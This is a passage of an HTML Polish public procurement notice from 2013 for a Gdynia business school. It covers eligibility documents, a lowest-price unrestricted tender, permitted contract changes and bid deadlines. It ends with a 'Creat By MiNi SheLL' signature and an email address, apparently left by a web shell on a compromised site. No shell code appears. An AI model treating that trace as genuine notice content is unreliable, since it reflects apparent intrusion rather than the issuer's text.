<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający wymaga od wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na warunkach jak we wzorcu umowy stanowiącym Załącznik nr 8 do niniejszej specyfikacji.
2.Złożenie oferty jest równoznaczne z akceptacją zawartych we wzorze klauzul, jednakże zamawiający określa porządkowy wymóg załączenia do oferty zaakceptowanego wzorca umowy.
3.Zamawiający przewiduje możliwość zmiany umowy w zakresie określonym w Rozdz. IV pkt 3 oraz, gdy w trakcie realizacji:
a)zamawiający zawiera umowę o zamówienie, którego wykonanie będzie niezbędne dla wykonania przedmiotowego zamówienia. W takim przypadku strony mogą przesunąć termin zakończenia wykonania niniejszego zamówienia, 
b)powstanie potrzeba przeprowadzenia dodatkowych badań lub ekspertyz, warunkujących wykonanie niniejszego zamówienia. W takim przypadku strony mogą przesunąć termin zakończenia wykonania umowy, 
c)wystąpi konieczność zmiany osób koordynujących (osób odpowiedzialnych za realizację ze strony Wykonawcy lub ze strony Zamawiającego).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wsaib.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wyższa Szkoła Administracji i Biznesu im. Eugeniusza Kwiatkowskiego z siedzibą: ul. Kielecka 7, 81-303 Gdynia
Kontakt:  tel. (58) 660 74 00, 661-209-015, faks (58) 621 12 70,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2013 godzina 13:00, miejsce: Wyższa Szkoła Administracji i Biznesu im. Eugeniusza Kwiatkowskiego z siedzibą: ul. Kielecka 7, 81-303 Gdynia, pok 305 (3 piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com